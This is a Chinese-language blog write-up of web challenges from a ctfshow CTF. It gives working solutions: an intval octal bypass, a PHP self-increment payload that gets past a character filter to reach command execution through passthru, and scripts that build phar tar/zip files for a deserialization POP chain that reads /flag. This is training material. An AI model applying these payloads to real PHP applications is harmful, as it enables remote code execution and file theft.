ctfshow吃瓜杯web wp

最新推荐文章于 2023-05-20 13:32:24 发布
最新推荐文章于 2023-05-20 13:32:24 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: 刷题记录 文章标签: php java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120355792
版权

热身

 <?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){                        
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

分析题目,需要绕过弱比较但不能用字母,考虑8进制绕过,前面需要多加一个字节,payload为

?num=+010574

shellme

搜索字符flag

shellme_revenge

考点:利用自增运算符来造成命令执行

打开是一个phpinfo界面,注意到cookie中有hint为looklook,猜想传入参数?looklook=1得到源码。

 <?php
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {

    phpinfo();
}
?>

首先我们知道ascii所有可见字符

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

执行正则匹配后还能用的字符:

image-20210915191538482

自增

<?php
echo ''.[];   #在php中,当把字符串和数组连接在一起时,最终返回的值是Array

字符构造:

PHP认为结果是无限大时,给出的结果是:INF(Infinite)
如果一个数超出 Infinite,那就是:   NaN(not-a-number)

<?php
$_=C;
$_++; //D
$C=++$_; //E
$_++; //F
$C_=++$_; //G
$_=(C/C.C){0}; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_=_.$C_.$C.++$_; //_GET
($$_{1})($$_{2}); //($_GET{1})($_GET{2})

所以

ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C){0};$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;($$_{1})($$_{2});

需要url编码!

同时get传入

?looklook=1&1=passthru&2=cat /flag.txt

ATTup

打开是一个文件上传界面,提示只能上传zip,rar,tar文件

上传成功后进入查询界面/search.html

查询成功后进入/find.php界面,此时查看源代码会发现部分源码

 public $fn;
    public function __invoke(){
        $text = base64_encode(file_get_contents($this->fn));
        echo "<script>alert('".$text."');self.location=document.referrer;</script>";
    }
}
class Fun{
    public $fun = ":)";
    public function __toString(){
        $fuc = $this->fun;
        $fuc();
        return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    }
    public function __destruct()
    {
        echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
    }
}
$filename = $_POST["file"];
$stat = @stat($filename);

前置

__invoke(),调用函数的方式调用一个对象时的回应方法
__toString(),类被当成字符串时的回应方法
__destruct(),类的析构函数
stat(),这个php函数用的很少, 用于返回关于文件的信息, 但是它也可以触发 phar 文件, 这里主要是考察了通过 zip 或 tar 文件包装的phar文件进行触发

tar

<?php
 class View {    
 public $fn;    
 public function __invoke(){        
     $text = base64_encode(file_get_contents($this->fn));
     echo "<script>alert('".$text."');self.location=document.referrer;</script>";
 }
}
class Fun{    
 public $fun = ":)";
 public function __toString(){
     $fuc = $this->fun;
     $fuc();
     return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
 }
 public function __destruct()    {
     echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
 }
}
$a = new View();
$a->fn = '/flag';
$b = new Fun();
$b->fun = $a;
$c = new Fun();
$c->fun = $b;
@unlink("phar.tar");
@system('rm -r .phar');
@system('mkdir .phar');
file_put_contents('.phar/.metadata',serialize($c));
system('tar -cf phar.tar .phar/*');

zip

<?php
 class View {    
 public $fn;    
 public function __invoke(){        
     $text = base64_encode(file_get_contents($this->fn));
     echo "<script>alert('".$text."');self.location=document.referrer;</script>";
 }
}
class Fun{    
 public $fun = ":)";
 public function __toString(){
     $fuc = $this->fun;
     $fuc();
     return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
 }
 public function __destruct()    {
     echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
 }
}
$a = new View();
$a->fn = '/flag';
$b = new Fun();
$b->fun = $a;
$c = new Fun();
$c->fun = $b;
$d = serialize($c);
if(file_exists('phar.zip')) {
 @unlink("phar.zip");
}
$zip = new ZipArchive;
$res = $zip->open('phar.zip', ZipArchive::CREATE);
$zip->addFromString('test.txt', 'file content goes here');
$zip->setArchiveComment($d);
$zip->close();

通过上传zip或tar文件包装的phar文件,可以绕过对<?php的语法检查,然后通过phar反序列化触发pop链得到flag

phar://./phar.tar
phar:///var/www/html/uploads/phar.tar

参考文章:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

https://blog.csdn.net/weixin_45669205/article/details/119706517

为什么要url编码

Snakin_ya
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-php特性系列
qq_45951598的博客
04-10 1072
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98 WEB89-数组绕过 源码: include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){
[ctf.show.reverse] 吃鸡杯 ezmore,有手就行,EzAutoRe
weixin_52640415的博客
04-27 452
ezmore 动调的题,跟进去在4019d6下断点看比较情况得到neft输入后得到flag组成提示 有手就行 一上来就猜入口是_main然后解到一个fake s2 = [99,23,113,2,106,5,114,9,109,2,93,36,75,62,97,13,100,15,106,53,83,50,89,60,3,60,65] s1 = [0]*len(s2) s1[0] = 99 #~(*(v1 - 2) & v2) & (*(v1 - 2) ^ v2) #~(s1[i-1
CTFshow-吃鸡杯-RE
qq_52974719的博客
08-02 625
这里写目录标题1、ezmore2、有手就行 1、ezmore 1、初步分析 exe文件,直接运行,可知要得到与flag相关的信息需要输入正确的文件下载码。 查下壳:32二位文件,直接ida32打开 2、静态分析 最开始的输入,然后跟一个if判断,其中i=2时为主要逻辑。 str内存储着我们输入的下闸码,接着进入了e2edef40ecaa776b8d32d58416998这个函数进行检验,v2是我们输入的编号,毫无疑问v2=8 函数主要是生成了一个str2,和我们的输入str1最终进行比较,可知前几句主
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3422
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshowPHP特性
遇事不决冲冲冲
08-23 4313
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
CtfHub-wpweb
最新发布
01-23
ctfhub平台webwp
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
ctfshow php特性
m0_63253040的博客
08-01 288
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
CTFshow吃瓜杯的两道web
D.MIND 的博客
08-17 970
http://0e53fed8-692c-4850-84e4-fad73918286c.challenge.ctf.show:8080/?looklook=1&0=highlight_file&1=../../../../../../flag.txt ctf_show=C%3B%24_%3DC%3B%2B%2B%24_%3B%24C%3D%2B%2B%24_%3B%2B%2B%24_%3B%24__%3D%2B%2B%24_%3B%24_%3D(C%2FC.C)%5B0%5D%3B%2B
ctfshow吃瓜杯web(除魔女)详解
qq_50589021的博客
09-06 886
shellme 搜索ctfshow即可 热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ //参数等于4476不行 die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ //匹配到小写字母和.不行
ctfshow 2021/7/9-10 吃鸡杯 6题
mumuzi的博客
07-10 1362
群主说要出简单的题目大家把这题想简单一点 直接把c转字符串即可 from libnum import * print(n2s(7539424334663709603622451394173266049480031393220309445902319310504736287365860451132752036622339554159799611768328686792828750952551268647863160547774237934958072391797341405165512721597085695
[CTFshow]吃瓜杯复现wp
Huamang的博客
08-19 767
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
ctfshow吃瓜杯 web
记录学习,一起进步
05-20 1067
ctfshow吃瓜杯 web
ctfshow吃瓜杯 misc writeup
ashMOB的博客
11-15 717
ctfshow吃瓜杯 misc writeup 基本还是看着大佬wp去复现 ctfshow吃瓜杯 八月群赛 WriteUp/WP_是Mumuzi的博客-CSDN博客 Misc游戏签到 游戏题,比较看脸,因为遇到太多次靶场死机所以直接抄flag上去了 She Never Owns a Window 下载下来打开发现是一个文本文件,但是有许多空白换行和tab 提示说不是SNOW(Steganography -SNOW- AVariation:这是一种创新的 隐写 技术,可用于隐藏两个单词之间的空格后面的文本数据
ctfshow-吃鸡杯-Crypto-Writeup
mxx307的博客
07-12 1136
吃鸡杯部分wpCryptoCop! Run!!题目思路才艺表演海那边漂来的漂流瓶群主说要出简单的题目大家把这题想简单一点The Dedication of Suspect MMisc信守着承诺 Crypto Cop! Run!! 题目 from Crypto.Util.number import * from flag import flag n = 1 << 8 p = getPrime(n) print(p) P.<t> = PolynomialRing(Zmod(p)) f
ctfshow 吃瓜杯八月赛 Misc WriteUp
Nancy523的博客
08-18 1030
目录 1、Misc游戏签到 2、吃瓜 3、EZbingo 4、魔王 5、Dinner of Cyanogen 6、Music Game 7、一群强盗 目录位置) 1、Misc游戏签到 别问 问就是玩游戏 套神说的) :多选杀戮 没有杀戮就选背刺 少选能量瓶子 吓死就对了^q^ 打了小几十把 脸黑没办法 期间遇到过环境卡死 3段flag闪退 环境罢工( 八神说 是python的错跟套神没关系呜呜呜 ctfshow{White_give_game_o...
ctfshow 菜狗杯 一言既出 wp
08-19
根据引用,在ctfshow菜狗杯比赛中,需要进行目录遍历,下载一个名为app.py的Python源码文件,并进行JWT解密。然后,需要将其中的一个布尔值false改为true。 根据引用,解压缩文件时,遇到了一个损坏的压缩包提示。通过以二进制方式打开文件,发现文件头是PNG图片的标识。所以,将文件的后缀名改为png。 根据引用,在这个比赛中有一道非常难的题目,做到第30关时,由于容器到期了而无法继续进行。作者只能用手机拍下阴影图,并逐个比对来解决问题。 综上所述,ctfshow菜狗杯比赛中的一言既出题目需要进行目录遍历、下载源码文件、JWT解密和修改布尔值;另外,还需要解决损坏压缩包的问题,并通过手机拍照和比对阴影图来解决困难的题目。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow菜狗杯wp](https://blog.csdn.net/m0_62274649/article/details/127899835)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值